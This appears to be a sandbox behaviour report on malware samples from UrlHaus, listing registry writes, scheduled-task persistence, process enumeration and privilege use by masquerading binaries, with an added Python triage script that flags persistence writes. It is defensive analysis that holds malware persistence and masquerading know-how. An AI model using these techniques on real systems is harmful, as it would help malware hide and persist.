Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\"" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ = "IPolicyStatusValue" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachineFallback\CLSID\ = "{598FE0E5-E02D-465D-9A9D-37974A28FD42}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\ = "IAppCommand" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-1004" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\LocalizedString = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-3000" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\CurVer\ = "GoogleUpdate.OnDemandCOMClassMachineFallback.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\ = "Google Update Policy Status Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods\ = "4" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods\ = "12" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\VERSIONINDEPENDENTPROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods\ = "7" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\VersionIndependentProgID\ = "GoogleUpdate.Update3WebMachine" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.PolicyStatusMachineFallback\ = "Google Update Policy Status Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods\ = "10" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\ = "Google Update Broker Class Factory" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6365D39F-2E73-4837-BC59-2014AAA20FA7}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\psmachine_64.dll" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\LOCALSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\LOCALSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\"" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
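Three of the tables above need a caveat before anything is raised on them. The Gxtuum.job rows under "Drops file in Windows directory" are the one clear persistence write in this section: C:\Windows\Tasks is where legacy Task Scheduler .job files live, and the writer runs from the Downloads folder. The "Event Triggered Execution: Netsh Helper DLL" rows, by contrast, show netsh.exe reading HKLM\SOFTWARE\WOW6432Node\Microsoft\NetSh, which it does on every start to find its helper DLLs; the persistence technique needs a value written under that key, and no such write appears here. And the "Modifies registry class" rows are all attributed to GoogleUpdate.exe and GoogleUpdateComRegisterShell64.exe, whose InProcServer32 and LocalServer32 values point into C:\Program Files (x86)\Google\Update\, consistent with an ordinary Google Update COM registration; the report does not say whether the ChromeSetup.exe that installed it is genuine, so keep those rows on a separate triage track rather than lumping them with the samples under UrlHausFiles. The Python below is an added example, not part of the sandbox's output: it parses rows in the report's "Description Indicator Process Target" layout (paths contain spaces, so the process column is found by locating the last `C:\` that starts a column rather than by splitting on whitespace) and applies those three rules. Rows 1 to 5 of the sample input are copied from the tables above; rows 6 and 7, attributed to a hypothetical sample.exe, are constructed to show the write-versus-read and COM-server-path rules firing. The trusted-directory list is a heuristic chosen for the example, not something the report defines.

```python
"""Triage rows in the report's "Description Indicator Process Target" layout.
Added example for this page, not part of the sandbox's output."""
import re

# Row labels that occur in the tables above.
DESCRIPTIONS = (
    "File opened for modification", "File created",
    "Key value enumerated", "Key value queried", "Key opened", "Key queried",
    "Key created", "Key deleted", "Set value (str)", "Set value (int)",
    "HTTP User-Agent header", "N/A",
)

# A path column starts after whitespace with C:\ followed by a non-backslash. Paths
# quoted inside registry values are rendered with doubled backslashes (C:\\...) and
# sit behind a quote, so both the lookbehind and the lookahead skip them.
PATH_START = re.compile(r"(?<!\S)C:\\(?!\\)")

# Heuristic chosen for this example: images under these directories are trusted,
# anything else on C: (Downloads, AppData, Temp, ...) counts as user-writable.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed input. Rows 1-5 are copied from the tables above; rows 6-7 are
# hypothetical (sample.exe, helper.dll and hijack.dll do not appear in the report).
SAMPLE_ROWS = r"""
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6365D39F-2E73-4837-BC59-2014AAA20FA7}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\psmachine_64.dll" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh\example = "C:\\Users\\Admin\\AppData\\Roaming\\helper.dll" C:\Users\Admin\Downloads\UrlHausFiles\sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Roaming\\hijack.dll" C:\Users\Admin\Downloads\UrlHausFiles\sample.exe N/A
"""


def parse_row(line):
    """Split one row into (description, indicator, process, target)."""
    for desc in DESCRIPTIONS:
        if line.startswith(desc + " "):
            rest = line[len(desc) + 1:].strip()
            break
    else:
        raise ValueError("unrecognised row: " + line)
    starts = [m.start() for m in PATH_START.finditer(rest)]
    if rest.endswith(" N/A"):                      # no target column
        body, target = rest[:-4].rstrip(), "N/A"
        starts = [s for s in starts if s < len(body)]
        if starts:                                 # last path start is the process column
            indicator, process = body[:starts[-1]].rstrip(), body[starts[-1]:]
        else:                                      # e.g. "N/A N/A" or "Go-http-client/1.1 N/A"
            indicator, _, process = body.rpartition(" ")
    else:                                          # process and target are both paths
        if len(starts) < 2:
            raise ValueError("cannot locate process/target: " + line)
        indicator = rest[:starts[-2]].rstrip()
        process = rest[starts[-2]:starts[-1]].rstrip()
        target = rest[starts[-1]:]
    return desc, indicator, process, target


def user_writable(path):
    p = path.lower()
    return p.startswith("c:\\") and not p.startswith(TRUSTED_DIRS)


def server_path(indicator):
    """Recover the module path from a 'key = "..."' value, undoing the report's
    doubled backslashes and escaped quotes."""
    m = re.search(r'= "(.*)"$', indicator)
    if not m:
        return None
    return m.group(1).replace("\\\\", "\\").replace('\\"', '"').strip('"')


def triage(rows):
    """Return (rule, process, detail) findings for the three rules discussed above."""
    findings = []
    for desc, indicator, process, _target in rows:
        low = indicator.lower()
        # 1. A file dropped into C:\Windows\Tasks (legacy .job tasks) by an untrusted image.
        if desc.startswith("File ") and low.startswith("c:\\windows\\tasks\\") and user_writable(process):
            findings.append(("task_job_drop", process, indicator))
        # 2. Netsh helper persistence needs a write under ...\Microsoft\NetSh; the reads
        #    by netsh.exe in the report are its normal start-up helper lookup and do not fire.
        if desc.startswith("Set value") and "\\microsoft\\netsh" in low:
            findings.append(("netsh_helper_write", process, indicator))
        # 3. A COM server registered from a user-writable path. Google Update's own
        #    registrations point into Program Files (x86) and are left alone.
        if desc.startswith("Set value") and ("inprocserver32" in low or "localserver32" in low):
            server = server_path(indicator)
            if server and user_writable(server):
                findings.append(("com_server_untrusted_path", process, server))
    return findings


def analyze(text):
    return triage([parse_row(l) for l in text.splitlines() if l.strip()])


if __name__ == "__main__":
    for rule, process, detail in analyze(SAMPLE_ROWS):
        print(rule.ljust(28), process)
        print(" " * 29 + detail)
```

Running it on the sample rows yields exactly three findings: the Gxtuum.job drop from row 1, and the two hypothetical writes from rows 6 and 7; the netsh reads, the WerFault crash and the Google Update InProcServer32 registration produce nothing. To run it over this report, paste the rows of a signature table into `SAMPLE_ROWS` or feed them to `analyze()`; rows with a description the list does not know raise rather than being silently mis-split.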

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ping.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\http.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\http.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
